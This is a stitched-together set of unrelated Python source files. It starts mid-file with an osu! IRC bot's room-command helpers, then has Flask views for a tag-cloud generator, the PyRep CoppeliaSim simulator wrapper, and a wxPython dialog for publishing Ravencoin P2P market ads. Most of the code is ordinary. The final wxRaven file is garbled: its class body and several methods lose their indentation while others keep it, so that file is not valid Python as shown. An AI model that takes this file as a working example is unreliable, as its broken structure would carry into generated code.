                        self.call_func(self.event_channel_message, models.Message(name, msg, channel_id))
                if f"!cho@ppy.sh join :#" in line:  # someone joined a room
                    room = line[line.rfind('#'):]
                    name = line[1:line.find("!")]
                    self.call_func(self.event_someone_joined_room, models.Message(name, room))
class BotApi:
    """Thin command helpers that send Bancho IRC messages through an OsuBot."""

    def __init__(self, bot: "OsuBot") -> None:
        self.bot = bot

    def send_private_message(self, username, message):
        """Send a private message to a user."""
        self.bot.send(f"PRIVMSG {username} :{message}")

    def send_channel_message(self, room_id, message):
        """Send a message to a multiplayer room channel."""
        self.bot.send(f"PRIVMSG {room_id} :{message}")

    def room_create(self, room_name, passwd="", free_mods=False, max_member=""):
        """Create a tournament room and return its channel id (e.g. "#mp_123").

        Blocks until the bot's receive loop sees BanchoBot's confirmation
        and fills ``bot.waiting_room[room_name]`` with the room id.
        """
        import time  # local import keeps the module's import surface unchanged
        self.bot.send(f"PRIVMSG BanchoBot :mp make {room_name}")
        self.bot.waiting_room[room_name] = ""
        while True:
            if self.bot.waiting_room[room_name] != "":
                room_id = self.bot.waiting_room[room_name]
                self.bot.waiting_room.pop(room_name)
                break
            # Avoid a 100% CPU busy-wait while BanchoBot's answer is pending.
            time.sleep(0.05)
        if passwd != "":
            self.bot.send(f"PRIVMSG {room_id} :!mp password {passwd}")
        if free_mods:
            self.bot.send(f"PRIVMSG {room_id} :!mp mods freemod")
        if max_member != "":
            self.bot.send(f"PRIVMSG {room_id} :!mp size {max_member}")
        self.bot.logger(f"Get room id: {room_id}")
        return room_id

    def room_set_passwd(self, room_id, passwd):
        """Set (or clear) the room password."""
        self.bot.send(f"PRIVMSG {room_id} :!mp password {passwd}")

    def room_set_max_member(self, room_id, max_member):
        """Set the maximum number of players in the room."""
        self.bot.send(f"PRIVMSG {room_id} :!mp size {max_member}")

    def room_set_host(self, room_id, host_name):
        """Transfer room host to the given player."""
        self.bot.send(f"PRIVMSG {room_id} :!mp host {host_name}")

    def room_set_mods(self, room_id, mods):
        """Set the room's active mods."""
        self.bot.send(f"PRIVMSG {room_id} :!mp mods {mods}")

    def room_strat_game(self, room_id):
        # NOTE(review): "strat" typo kept (sic) for caller compatibility.
        """Start the match in the given room."""
        self.bot.send(f"PRIVMSG {room_id} :!mp start")

    def room_change_map(self, room_id, map_id, mode=""):
        """Change the room's beatmap, optionally forcing a game mode."""
        _run = f"PRIVMSG {room_id} :!mp map {map_id}"
        if mode != "":
            _run = f"{_run} {mode}"
        self.bot.send(_run)
|
views.py | import os
from flask import render_template, request, send_from_directory, redirect
from threading import Thread
from app import app
from app import twitapp,tagcloud
from app.utils import maintenance,gettoken,process_source,process_uploaded_txt_file,allowed_file_img
@app.route('/',methods=['GET'])
def index():
    """Render the landing page, stripping any stray query string first."""
    maintenance()
    # A GET with query parameters is redirected to the clean URL
    # (request.args is falsy when empty; the old bool() was redundant).
    if request.args:
        return redirect('/')
    return render_template('index.html')
@app.route('/',methods=['POST'])
def index_process():
    """Dispatch a form POST: recolor an existing cloud or create a new one."""
    # Presence of a 'token' field means the user is recoloring a prior result.
    # (Membership test directly on the mapping; .keys() was redundant.)
    if 'token' in request.form:
        return recolor_tagcloud(request=request)
    return create_tagcloud(request=request)
@app.route('/updatetwitter',methods=['GET'])
def update_twitter_tagclouds():
    """Kick off a background thread that posts tag clouds to Twitter."""
    # Fire-and-forget: the request returns immediately while the thread works.
    t = Thread(target=twitapp.post_tags_from_url,args=('news.yandex.ru',))
    t.start()
    return render_template('redirect.html')
    #return redirect('/')
def create_tagcloud(request):
    """Build a tag cloud image from the submitted source text, options and mask.

    Returns the rendered result page on success, or the index page with an
    error code describing which input failed.
    """
    token = gettoken()
    # SOURCEFILE AND URL
    try:
        sourcefilename = process_source(token=token,uploadedfile=request.files['source'],weburl=request.form['pageurl'])
    except Exception:
        # Neither an uploaded file nor a fetchable URL was usable.
        # (Was a bare `except:`, which also swallowed SystemExit et al.)
        return render_template('index.html', error='nosource')
    # STOPWORDSFILE
    if request.files['stopwords']:
        try:
            stopwordsfilename = os.path.join(app.config['UPLOAD_FOLDER'], ''.join(['stopwords', token, '.txt']))
            process_uploaded_txt_file(uploadedfile=request.files['stopwords'], targetfilename=stopwordsfilename)
        except Exception:
            return render_template('index.html', error='stoptxtfile')
    else:
        stopwordsfilename = None
    # MASKFILE
    mask_file = request.files['mask']  # renamed: `file` shadowed the builtin
    if mask_file:
        if allowed_file_img(mask_file.filename) and mask_file.content_length < app.config['MAX_FILE_CONTENT_LENGTH']:
            maskfilename = os.path.join(app.config['UPLOAD_FOLDER'], ''.join(['maskfile', token]))
            mask_file.save(maskfilename)
        else:
            return render_template('index.html', error='maskfile')
    else:
        maskfilename = None
    # MAX_COUNT
    if request.form['max_words']:
        max_words = int(request.form['max_words'])
    else:
        max_words = 250
    # Checkbox fields are present in the form only when checked.
    randomizecolors = 'randomizecolors' in request.form
    ignorebasestopwords = 'ignorebasestopwords' in request.form
    outputfilename = os.path.join(app.config['OUTPUT_FOLDER'], ''.join(['tagcloud_', token, '.png']))
    layoutfilename = os.path.join(app.config['UPLOAD_FOLDER'], ''.join(['layout', token]))
    if tagcloud.createcloud(sourcefilename=sourcefilename,
                            stopwordsfilename=stopwordsfilename,
                            ignorebasestopwords=ignorebasestopwords,
                            outputfilename=outputfilename,
                            layoutfilename=layoutfilename,
                            maskfilename=maskfilename,
                            randomizecolors=randomizecolors,
                            max_words=max_words):
        # Cache-busting query suffix so the browser reloads the new image.
        return render_template('result.html',
                               filename=''.join(['/output/',''.join(['tagcloud_', token, '.png']),'?',gettoken()]),
                               randomizecolors=randomizecolors,
                               token=token)
    else:
        return render_template('index.html', error='tagcloud')
def recolor_tagcloud(request):
    """Re-run the coloring pass on a previously generated tag cloud.

    The `token` form field identifies the earlier result's files.
    """
    token = request.form['token']
    # The comparison already yields a bool; `True if ... else False` was noise.
    randomizecolors = request.form['randomizecolors'] == 'True'
    maskfilename = os.path.join(app.config['UPLOAD_FOLDER'], ''.join(['maskfile', token]))
    if not os.path.isfile(maskfilename):
        maskfilename = None
    outputfilename = os.path.join(app.config['OUTPUT_FOLDER'], ''.join(['tagcloud_', token, '.png']))
    if tagcloud.recolor_cloud(outputfilename=outputfilename,
                              maskfilename=maskfilename,
                              randomizecolors=randomizecolors,
                              token=token):
        # Cache-busting query suffix so the browser reloads the new image.
        return render_template('result.html',
                               filename=''.join(['/output/', ''.join(['tagcloud_', token, '.png']), '?', gettoken()]),
                               randomizecolors=randomizecolors,
                               token=token)
    else:
        return render_template('index.html', error='error')
@app.route('/robots.txt')
@app.route('/sitemap.xml')
def static_from_root():
    """Serve robots.txt / sitemap.xml straight from the static folder."""
    return send_from_directory(app.static_folder, request.path[1:])
@app.route('/examples')
def see_examples():
    """Show the gallery of example tag clouds."""
    return render_template('examples.html')
@app.errorhandler(404)
def page_not_found(e):
    """Redirect unknown URLs to the index page instead of rendering a 404."""
    return redirect('/')
@app.route('/output/<filename>')
def output_file(filename):
    """Serve a generated tag cloud image from the output folder."""
    return send_from_directory(os.path.abspath(app.config['OUTPUT_FOLDER']),filename)
|
pyrep.py | import numpy as np
from contextlib import contextmanager
from pyrep.backend import sim, utils
from pyrep.objects.object import Object
from pyrep.objects.shape import Shape
from pyrep.textures.texture import Texture
from pyrep.errors import PyRepError
from pyrep.backend import sim
import os
import sys
import time
import threading
from threading import Lock
from typing import Tuple, List
import warnings
def fileno(file_or_fd):
    """Return the OS file descriptor for a file object, or the int unchanged."""
    getter = getattr(file_or_fd, 'fileno', lambda: file_or_fd)
    fd = getter()
    if not isinstance(fd, int):
        raise ValueError("Expected a file (`.fileno()`) or a file descriptor")
    return fd
@contextmanager
def stdout_redirected(to=os.devnull, stdout=None):
    """Temporarily redirect `stdout` (default sys.stdout) at the OS fd level.

    Because the underlying file descriptor is duplicated and swapped,
    output written by C extensions is captured too, not just Python writes.
    """
    if stdout is None:
        stdout = sys.stdout
    stdout_fd = fileno(stdout)
    # Keep a duplicate of the original fd so it can be restored afterwards.
    with os.fdopen(os.dup(stdout_fd), 'wb') as copied:
        stdout.flush()
        try:
            os.dup2(fileno(to), stdout_fd)
        except ValueError:
            # `to` is a path rather than a file/fd: open it first.
            with open(to, 'wb') as to_file:
                os.dup2(to_file.fileno(), stdout_fd)
        try:
            yield stdout
        finally:
            stdout.flush()
            os.dup2(copied.fileno(), stdout_fd)
class PyRep(object):
    """Used for interfacing with the CoppeliaSim simulation.

    Can be used for starting, stopping, and stepping the simulation. As well
    as getting, and creating scene objects and robots.
    """

    def __init__(self):
        self.running = False
        self._process = None
        self._robot_to_count = {}
        self.connected = False
        self._ui_thread = None
        self._responsive_ui_thread = None
        # Serializes simExtStep calls between the simulation thread and the
        # responsive-UI thread.
        self._step_lock = Lock()
        self._init_thread_id = None
        self._shutting_down = False
        self._handles_to_objects = {}
        if 'COPPELIASIM_ROOT' not in os.environ:
            raise PyRepError(
                'COPPELIASIM_ROOT not defined. See installation instructions.')
        self._vrep_root = os.environ['COPPELIASIM_ROOT']
        if not os.path.exists(self._vrep_root):
            raise PyRepError(
                'COPPELIASIM_ROOT was not a correct path. '
                'See installation instructions')

    def _run_ui_thread(self, scene_file: str, headless: bool, write_coppeliasim_stdout_to_file: bool) -> None:
        # Need this otherwise extensions will not be loaded
        os.chdir(self._vrep_root)
        options = sim.sim_gui_headless if headless else sim.sim_gui_all
        if write_coppeliasim_stdout_to_file:
            # Redirect CoppeliaSim's (fd-level) stdout into a unique log file.
            with open('/tmp/CoppeliaSimLog' + str(time.perf_counter()).replace('.', '') + '.txt', 'w+') as f, \
                    stdout_redirected(f):
                sim.simExtLaunchUIThread(options=options, scene=scene_file, pyrep_root=self._vrep_root)
        else:
            sim.simExtLaunchUIThread(options=options, scene=scene_file, pyrep_root=self._vrep_root)

    def _run_responsive_ui_thread(self) -> None:
        # Keeps the UI redrawing while the physics simulation is stopped.
        while True:
            if not self.running:
                with self._step_lock:
                    if self._shutting_down or sim.simExtGetExitRequest():
                        break
                    sim.simExtStep(False)
            time.sleep(0.01)
        # If the exit request was from the UI, then call shutdown, otherwise
        # shutdown caused this thread to terminate.
        if not self._shutting_down:
            self.shutdown()

    def launch(self, scene_file="", headless=False, responsive_ui=False,
               blocking=False, write_coppeliasim_stdout_to_file=False) -> None:
        """Launches CoppeliaSim.

        Launches the UI thread, waits until the UI thread has finished, this
        results in the current thread becoming the simulation thread.

        :param scene_file: The scene file to load. Empty string for empty scene.
        :param headless: Run CoppeliaSim in simulation mode.
        :param responsive_ui: If True, then a separate thread will be created to
            asynchronously step the UI of CoppeliaSim. Note, that will reduce
            the responsiveness of the simulation thread.
        :param blocking: Causes CoppeliaSim to launch as if running the default
            c++ client application. This is causes the function to block.
            For most users, this will be set to False.
        :param write_coppeliasim_stdout_to_file: Causes CoppeliaSim to write the stdout to files in /tmp, rather than
            the terminal stdout as the python script is run. This helps reduce screen clutter, particularly if using
            multiple PyRep instances with multiprocessing, for example.
        """
        abs_scene_file = os.path.abspath(scene_file)
        if len(scene_file) > 0 and not os.path.isfile(abs_scene_file):
            raise PyRepError('Scene file does not exist: %s' % scene_file)
        cwd = os.getcwd()
        self._ui_thread = threading.Thread(target=self._run_ui_thread,
                                           args=(abs_scene_file, headless, write_coppeliasim_stdout_to_file))
        self._ui_thread.daemon = True
        self._ui_thread.start()
        # Wait for the UI thread to finish initializing before claiming the
        # simulation thread for ourselves.
        while not sim.simExtCanInitSimThread():
            time.sleep(0.1)
        sim.simExtSimThreadInit()
        time.sleep(0.2)  # Stops CoppeliaSim crashing if restarted too quickly.
        if blocking:
            while not sim.simExtGetExitRequest():
                sim.simExtStep()
            self.shutdown()
        elif responsive_ui:
            self._responsive_ui_thread = threading.Thread(
                target=self._run_responsive_ui_thread)
            self._responsive_ui_thread.daemon = True
            try:
                self._responsive_ui_thread.start()
            except (KeyboardInterrupt, SystemExit):
                if not self._shutting_down:
                    self.shutdown()
                sys.exit()
            self.step()
        else:
            self.step()
        os.chdir(cwd)  # Go back to the previous cwd

    def script_call(self, function_name_at_script_name: str,
                    script_handle_or_type: int,
                    ints=(), floats=(), strings=(), bytes='') -> (
            Tuple[List[int], List[float], List[str], str]):
        """Calls a script function (from a plugin, the main client application,
        or from another script). This represents a callback inside of a script.

        :param function_name_at_script_name: A string representing the function
            name and script name, e.g. myFunctionName@theScriptName. When the
            script is not associated with an object, then just specify the
            function name.
        :param script_handle_or_type: The handle of the script, otherwise the
            type of the script.
        :param ints: The input ints to the script.
        :param floats: The input floats to the script.
        :param strings: The input strings to the script.
        :param bytes: The input bytes to the script (as a string).
            NOTE: parameter name shadows the builtin `bytes`; kept for
            backward compatibility with existing callers.
        :return: Any number of return values from the called Lua function.
        """
        return utils.script_call(
            function_name_at_script_name, script_handle_or_type, ints, floats,
            strings, bytes)

    def shutdown(self) -> None:
        """Shuts down the CoppeliaSim simulation.
        """
        if self._ui_thread is None:
            raise PyRepError(
                'CoppeliaSim has not been launched. Call launch first.')
        # The guard above already ensures a UI thread exists (the original
        # code re-checked `is not None` redundantly).
        self._shutting_down = True
        self.stop()
        self.step_ui()
        sim.simExtPostExitRequest()
        sim.simExtSimThreadDestroy()
        self._ui_thread.join()
        if self._responsive_ui_thread is not None:
            self._responsive_ui_thread.join()
        # CoppeliaSim crashes if new instance opened too quickly after shutdown.
        # TODO: A small sleep stops this for now.
        time.sleep(0.1)
        self._ui_thread = None
        self._shutting_down = False

    def start(self) -> None:
        """Starts the physics simulation if it is not already running.
        """
        if self._ui_thread is None:
            raise PyRepError(
                'CoppeliaSim has not been launched. Call launch first.')
        if not self.running:
            sim.simStartSimulation()
            self.running = True

    def stop(self) -> None:
        """Stops the physics simulation if it is running.
        """
        if self._ui_thread is None:
            raise PyRepError(
                'CoppeliaSim has not been launched. Call launch first.')
        if self.running:
            sim.simStopSimulation()
            self.running = False
            # Need this so the UI updates.  (Plain loop replaces the
            # side-effect-only list comprehension.)
            for _ in range(5):
                self.step()

    def step(self) -> None:
        """Execute the next simulation step.

        If the physics simulation is not running, then this will only update
        the UI.
        """
        with self._step_lock:
            sim.simExtStep()

    def step_ui(self) -> None:
        """Update the UI.

        This will not execute the next simulation step, even if the physics
        simulation is running.
        This is only applicable when PyRep was launched without a responsive UI.
        """
        with self._step_lock:
            sim.simExtStep(False)

    def set_simulation_timestep(self, dt: float) -> None:
        """Sets the simulation time step. Default is 0.05.

        :param dt: The time step value in seconds.
        """
        sim.simSetFloatParameter(sim.sim_floatparam_simulation_time_step, dt)
        if not np.allclose(self.get_simulation_timestep(), dt):
            warnings.warn('Could not change simulation timestep. You may need '
                          'to change it to "custom dt" using simulation '
                          'settings dialog.')

    def get_simulation_timestep(self) -> float:
        """Gets the simulation time step.

        :return: The time step value in seconds.
        """
        return sim.simGetSimulationTimeStep()

    def set_simulation_passes_per_rendering_pass(self, ppf: int) -> None:
        """Sets the number of simulation passes per rendering pass.

        :param ppf: Number of simulation passes per rendering pass.
        """
        sim.simSetSimulationPassesPerRenderingPass(ppf)
        if not np.allclose(self.get_simulation_passes_per_rendering_pass(), ppf):
            warnings.warn('Could not change the number of simulation passes '
                          'per rendering pass. You may need to change it the '
                          'time step to "custom dt" using simulation settings '
                          'dialog.')

    def get_simulation_passes_per_rendering_pass(self) -> float:
        """Gets the number of simulation passes per rendering pass.

        :return: Number of simulation passes per rendering pass.
        """
        return sim.simGetSimulationPassesPerRenderingPass()

    def set_configuration_tree(self, config_tree: bytes) -> None:
        """Restores configuration information previously retrieved.

        Configuration information (object relative positions/orientations,
        joint/path values) can be retrieved with
        :py:meth:`Object.get_configuration_tree`. Dynamically simulated
        objects will implicitly be reset before the command is applied
        (i.e. similar to calling :py:meth:`Object.reset_dynamic_object` just
        before).

        :param config_tree: The configuration tree to restore.
        """
        sim.simSetConfigurationTree(config_tree)

    def group_objects(self, objects: List[Shape]) -> Shape:
        """Groups several shapes into a compound shape (or simple shape).

        :param objects: The list of shapes to group.
        :return: A single grouped shape.
        """
        handles = [o.get_handle() for o in objects]
        handle = sim.simGroupShapes(handles)
        return Shape(handle)

    def merge_objects(self, objects: List[Shape]) -> Shape:
        """Merges several shapes into a compound shape (or simple shape).

        :param objects: The list of shapes to group.
        :return: A single merged shape.
        """
        handles = [o.get_handle() for o in objects]
        # FIXME: sim.simGroupShapes(merge=True) won't return correct handle,
        # so we use name to find correct handle of the merged shape.
        name = objects[-1].get_name()
        sim.simGroupShapes(handles, merge=True)
        return Shape(name)

    def export_scene(self, filename: str) -> None:
        """Saves the current scene.

        :param filename: scene filename. The filename extension is required
            ("ttt").
        """
        sim.simSaveScene(filename)

    def import_model(self, filename: str) -> Object:
        """ Loads a previously saved model.

        :param filename: model filename. The filename extension is required
            ("ttm"). An optional "@copy" can be appended to the filename, in
            which case the model's objects will be named/renamed as if an
            associated script was attached to the model.
        :return: The imported model.
        """
        handle = sim.simLoadModel(filename)
        return utils.to_type(handle)

    def create_texture(self, filename: str, interpolate=True, decal_mode=False,
                       repeat_along_u=False, repeat_along_v=False
                       ) -> Tuple[Shape, Texture]:
        """Creates a planar shape that is textured.

        :param filename: Path to the texture to load.
        :param interpolate: Adjacent texture pixels are not interpolated.
        :param decal_mode: Texture is applied as a decal (its appearance
            won't be influenced by light conditions).
        :param repeat_along_u: Texture will be repeated along the U direction.
        :param repeat_along_v: Texture will be repeated along the V direction.
        :return: A tuple containing the textured plane and the texture.
        """
        options = 0
        if not interpolate:
            options |= 1
        if decal_mode:
            options |= 2
        # Bit-coded options: the repeat flags are bits 2 and 3 (values 4 and
        # 8).  The previous values (3 and 4) overlapped the interpolate/decal
        # bits, so enabling repeat_along_u wrongly forced decal mode.
        if repeat_along_u:
            options |= 4
        if repeat_along_v:
            options |= 8
        handle = sim.simCreateTexture(filename, options)
        s = Shape(handle)
        return s, s.get_texture()

    def get_objects_in_tree(self, root_object=None, *args, **kwargs
                            ) -> List[Object]:
        """Retrieves the objects in a given hierarchy tree.

        :param root_object: The root object in the tree. Pass None to retrieve
            all objects in the configuration tree. :py:class:`Object` or `int`.
        :param object_type: The object type to retrieve.
            One of :py:class:`.ObjectType`.
        :param exclude_base: Exclude the tree base from the returned list.
        :param first_generation_only: Include in the returned list only the
            object's first children. Otherwise, entire hierarchy is returned.
        :return: A list of objects in the hierarchy tree.
        """
        return Object._get_objects_in_tree(root_object, *args, **kwargs)

    def get_collection_handle_by_name(self, collection_name: str) -> int:
        """Retrieves the integer handle for a given collection.

        :param collection_name: Name of the collection to retrieve the integer handle for
        :return: An integer handle for the collection
        """
        return sim.simGetCollectionHandle(collection_name)
|
wxRavenP2PMarketNewAdDialogLogic.py | '''
Created on 8 janv. 2022
@author: slinux
'''
#from .wxRavenTutorialPluginDesign import *
import threading
import time
from .wxRavenP2PMarketDesign import *
from wxRavenGUI.application.wxcustom import *
from libs.RVNpyRPC._P2PmarketPlace import RavencoinP2PMarketPlaceAd, _P2PMARKET_ID_
from .wxRavenCreateAtomicSwapLogic import *
#from .wxRavenP2PMarket_AtomicTxPanel import *
from .wxRavenP2PMarket_RawTxPanel import *
import os
import time
from datetime import datetime
import logging
class wxRavenP2PMarket_NewAdWithLogic(wxRavenP2PMarket_NewAdDialog):
'''
classdocs
'''
#
#
# Datas for the plugin display style
#
#
view_base_name = "New P2P Market Ad"
view_name = "New P2P Market Ad"
parent_frame = None
default_position = "dialog"
icon = 'p2p_icon_new'#wx.Bitmap( u"res/default_style/normal/help_view.png", wx.BITMAP_TYPE_ANY )
    def __init__(self,parent, parentFrame, position = "dialog", viewName= "New P2P Market Ad", isInternalPluginView=True):
        '''
        Constructor

        :param parent: wx parent window (the hosting dialog)
        :param parentFrame: main application frame (resources, paths, plugins)
        :param position: docking position; "dialog" for a floating dialog
        :param viewName: display name of this view
        :param isInternalPluginView: True when the panel is created by the plugin itself
        '''
        super().__init__(parent=parent)
        #
        # Your constructor here
        #
        self.view_base_name = "New P2P Market Ad"
        self.view_name = viewName
        self.parent_frame = parentFrame
        self.default_position = position
        self.parent = parent
        self.logger = logging.getLogger('wxRaven')
        # Toolbar toggle icons: wizard assistant vs. raw transaction view.
        self.m_toggleAssistant.SetBitmap(parentFrame.RessourcesProvider.GetImage('wizard_ico'))
        self.m_toggleRawTxDatas.SetBitmap(parentFrame.RessourcesProvider.GetImage('raw_datas'))
        self._useWizard = True
        # Millisecond timestamp used to make generated artifacts unique.
        self._timestamp = round(time.time() * 1000)
        self._filegenerated = False
        self._validChanel = False
        self._MethodsPanelList = {}
        self.TxMethodPanelSizer = None
        #
        #
        # Wizard default datas
        #
        self._newAdObject = RavencoinP2PMarketPlaceAd()
        self._newAdObject._adType=0
        self._newAdObject._adTxType=0
        self._newAdObject._adOrders=1
        self._newAdObject._adAssetQt=1
        self._newAdObject.m_AdAssetPrice='rvn'
        self._newAdObject._adPrice=200
        self._forceManual = False
        self.savepath = self.parent_frame.Paths['USERDATA'] + 'p2pmarket/'
        #
        #
        #
        '''
        self._MethodsPanelList = {0:wxRavenP2PMarket_NewAtomiSwapWithLogic,
                                  1:wxRavenP2PMarket_NewAtomiSwapWithLogic,
                                  2:wxRavenP2PMarket_NewAtomiSwapWithLogic}
        '''
        #_defaultAtomicSwapPanel = self.__LoadMethodPanel__(wxRavenP2PMarket_AdAtomiSwapWithLogic, True)
        _defaultAtomicSwapPanel = self.__LoadMethodPanel__(wxRavenP2PMarket_NewAtomiSwapWithLogic, True)
        _RawAtomicSwapPanel = self.__LoadMethodPanel__(wxRavenP2PMarket_RawAtomiSwapWithLogic, False)
        # Maps ad tx-type index -> pre-built panel (index 1 has no panel yet).
        self._MethodsPanelList = {0:_defaultAtomicSwapPanel ,
                                  1:None ,
                                  2: _RawAtomicSwapPanel}
        self.setupPanel()
        #This is to add the view in the appropriate place using the mainapp to do so
        #
        #The only exception is when the pannel itself is called by the plugin or another view
        #In this case the position in main app must not be managed (see rpc command panel as example)
        #
        #if not isInternalPluginView:
        #    parentFrame.Add(self, self.view_name ,position, parentFrame.RessourcesProvider.GetImage(self.icon))
        self.Layout()
        self.SetSizerAndFit(self.GetSizer(), deleteOld=False)
        self.parent.ResizeDialog()
        #
        # If your app need to load a bunch of data, it may want to wait the app is ready
        # specially at startup + resume of plugins
        # Use this thread method + callback to manage the 1sec/2sec init delay
        #
        #
        #self.waitApplicationReady()
    def OnWizardButtonToggle(self, evt):
        """Switch between wizard-assisted mode and manual IPFS-hash entry."""
        self._useWizard = self.m_toggleAssistant.GetValue()
        if self._useWizard:
            self.m_assistantPanel.Show()
            # The hash field is produced by the wizard, so lock it.
            self.m_AdFileIPFSHash.Enable(enable=False)
            self.m_PreviewAdBt.Show()
            # Publishing is only possible once the ad file has been generated.
            if self._filegenerated:
                self.m_GeneraeteAdBt.Enable(True)
            else:
                self.m_GeneraeteAdBt.Enable(False)
        else:
            self.m_assistantPanel.Hide()
            # Manual mode: the user pastes the IPFS hash directly.
            self.m_AdFileIPFSHash.Enable(enable=True)
            self.m_PreviewAdBt.Hide()
            #self.m_staticline18.Hide()
            #self.m_txDatas.Hide()
            self.m_GeneraeteAdBt.Enable(True)
        #self.SetSizerAndFit(sizer, deleteOld=True)
        self.SetSizerAndFit(self.GetSizer(), deleteOld=False)
        #self.Layout()
        self.parent.ResizeDialog()
def OnGenerateButtonClick(self, evt):
_userCheck = UserQuestion(self, "Once publish you cannot modify the Ad anymore, continue ?")
if _userCheck:
ravencoin = self.parent_frame.getRvnRPC()
myPlugin = self.parent_frame.GetPlugin('P2PMarket')
p2p_channel_asset_target_address = myPlugin.PLUGIN_SETTINGS['p2p_channel_asset_target_address']
p2p_market_change_address = myPlugin.PLUGIN_SETTINGS['p2p_market_change_address']
_hashFile = self.m_AdFileIPFSHash.GetValue()
_fakeResult = {'result':None , 'error': {'code':-1, 'message': f"Unknown error, please check logs."}}
try:
_fakeResult = ravencoin.p2pmarket.PublishNewP2PAd(self._newAdObject._adP2PChannelAsset, p2p_channel_asset_target_address, _hashFile, p2p_market_change_address, expiration=200000000 )
#UserInfo(self, "Your asset is on the P2P Marketplace !")
except Exception as e:
self.parent_frame.Log("Unable to load publish p2p Market ad." , type="error")
_fakeResult = {'result':None , 'error': {'code':-1, 'message': e}}
ReportRPCResult(self.parent_frame, _fakeResult, "success", "Your asset is on the P2P Marketplace !", "Unable to publish your ad.", False)
def OnPreviewAdButtonClick(self, evt):
self.OnAdTypeChanged(None)
self.OnTitleChanged(None)
#self.OnAssetChanged(None)
self.OnTxMethodChanged(None)
#self.OnQuantityChanged(None)
#self.OnPriceChanged(None)
self.OnLinkChanged(None)
self.OnDescriptionChanged(None)
self.OnP2PChannelChanged(None)
self.OnKeywordChanged(None)
myPlugin = self.parent_frame.GetPlugin('P2PMarket')
ravencoin = self.parent_frame.getRvnRPC()
_hasvalidTx = False
_hasTx = False
print(self._newAdObject)
_fakeResult = {'result':None , 'error': {'code':-1, 'message': f"Unknown error, please check logs."}}
if self._newAdObject.isEmptyTxData():
_doCreateSwap = False
_doCreateSwap = UserQuestion(self, "The atomic swap transaction is not yet created, create it now ?")
if _doCreateSwap :
self._newAdObject = ravencoin.p2pmarket.CreateAtomicSwapTransaction(self._newAdObject)
self.logger.info(f"CreateAtomicSwapTransaction DONE = {self._newAdObject._adTxDatas}")
if self._newAdObject.isEmptyTxData():
self.m_P2PmethodErrorText.SetLabel("Error : No Atomicswap datas tx generated !")
self.m_bitmap38.SetBitmap(self.parent_frame.RessourcesProvider.GetImage('error_tsk'))
#self.m_atomicTransactionUserFeedback.SetLabel("Error : No Atomicswap datas tx generated")
else:
self.m_P2PmethodErrorText.SetLabel("P2P Method : Atomicswap datas found !")
self.m_bitmap38.SetBitmap(self.parent_frame.RessourcesProvider.GetImage('passed'))
self.LockAllMethodPanel(True)
self.SetManualPanelValue(self._newAdObject._adTxDatas)
self.logger.info(f"P2P Method : Atomicswap datas found , verifying TX")
_hasTx=True
try:
_valid, _data = myPlugin.DecodeTx(self._newAdObject._adTxDatas[0])
if _valid:
_hasvalidTx = True
except Exception as e:
self.logger.error(f"P2P Method : error in TX")
_hasvalidTx = False
self.Layout()
self.m_assistantPanel.Layout()
_hash = None
if _hasTx and _hasvalidTx:
pass
_filtetosave = self.savepath + 'p2p_market_order' + str(self._timestamp) + '.json'
f = open(_filtetosave, "w")
f.write(str(self._newAdObject.JSON()))
f.close()
#
#ALL GOOD
#self.m_atomicTransactionUserFeedback.SetLabel(self._newAdObject._adTxDatas)
ipfsPlugins = self.parent_frame.GetPlugin('IPFS')
_hash = None
if ipfsPlugins != None:
try:
_hash = ipfsPlugins.UploadJSONToIPFS_RPC(str(self._newAdObject.JSON()))
except Exception as e:
self.parent_frame.Log("Unable to load upload p2p Market json datas to IPFS." , type="error")
if _hash!=None:
self.m_AdFileIPFSHash.SetValue(str(_hash))
if _hash == None:
#UserInfo(self, f"No IPFS Plugin or an error occured, filed has been saved in {_filtetosave} for manual upload.")
UserAdvancedMessage(self.parent_frame, f"No IPFS Plugin or an error occured, filed has been saved in {_filtetosave} for manual upload.", "info", msgdetails=_filtetosave, showCancel=False)
else:
#UserError(self, f"An error occured while creating the atomic swap, please retry.")
UserAdvancedMessage(self.parent_frame, f"An error occured while creating the atomic swap, please retry.", "error", msgdetails='', showCancel=False)
self.m_toggleRawTxDatas.SetValue(True)
self.SwitchMethodPanel(manual=True)
if _hash != None :
self.m_GeneraeteAdBt.Enable(True)
#UserInfo(self, f"Ad created, ready for upload.")
UserAdvancedMessage(self.parent_frame, f"Ad created, ready for upload.", "info", msgdetails='', showCancel=False)
#else:
# self.parent_frame.Log("Unable to load upload p2p Market json datas to IPFS." , type="error")
self.logger.info(self._newAdObject.JSON())
#self._newAdObject._adAsset =
def OnAdTypeChanged(self, evt):
self._newAdObject._adType = self.m_radioBox1.GetSelection()
self.OnTxMethodChanged(evt)
    def OnTitleChanged(self, evt):
        # Mirror the title text field into the ad model.
        self._newAdObject._adTitle = self.m_AdTitle.GetValue()
    # Disabled handler kept for reference (asset choice is currently unused).
    """
    def OnAssetChanged(self, evt):
        self._newAdObject._adAsset = self.m_AdAssetChoice.GetString(self.m_AdAssetChoice.GetCurrentSelection())
    """
def OnToggleRawTxData(self, evt):
self.OnTxMethodChanged(evt)
def OnCreateUTXODialogClicked(self, evt):
myPlugin = self.parent_frame.GetPlugin('P2PMarket')
myPlugin.CreateNewUTXO()
def OnTxMethodChanged(self, evt):
_str = self.m_txMethod.GetString(self.m_txMethod.GetCurrentSelection())
self.logger.info(_str)
self._newAdObject._adTxType = _P2PMARKET_ID_[_str]
_forceManual = self.m_toggleRawTxDatas.GetValue()
self._forceManual = _forceManual
self.SwitchMethodPanel(manual=_forceManual)
def LockAllMethodPanel(self, locking):
for panKey in self._MethodsPanelList:
pan = self._MethodsPanelList[panKey]
self.logger.info(f'found {panKey} {pan}')
if pan != None:
self.logger.info(f'locking {panKey}')
try:
pan.LockPanel(locking)
except Exception as e:
pass
def SetManualPanelValue(self, val):
_manualPanel = self._MethodsPanelList[2]
if _manualPanel != None:
_manualPanel.m_rawDatasText.SetValue(str(val))
    def SwitchMethodPanel(self,manual=False):
        """Show the sub-panel matching the current tx type (or the manual raw-tx
        panel when *manual* is True) and hide all the others."""
        self.logger.info(f"SwitchMethodPanel {manual}")
        _type = self._newAdObject._adTxType
        _adtype = self._newAdObject._adType
        if self._MethodsPanelList == {}:
            # Panels not loaded yet (constructor still running).
            return
        if manual == True:
            # Index 2 is the raw/manual atomic-swap panel.
            _type = 2
        # Hide every panel first, then show only the selected one.
        for panKey in self._MethodsPanelList:
            pan = self._MethodsPanelList[panKey]
            self.logger.info(f'found {panKey} {pan}')
            if pan != None:
                self.logger.info(f'hiding {panKey}')
                pan.Hide()
        self.logger.info(_type)
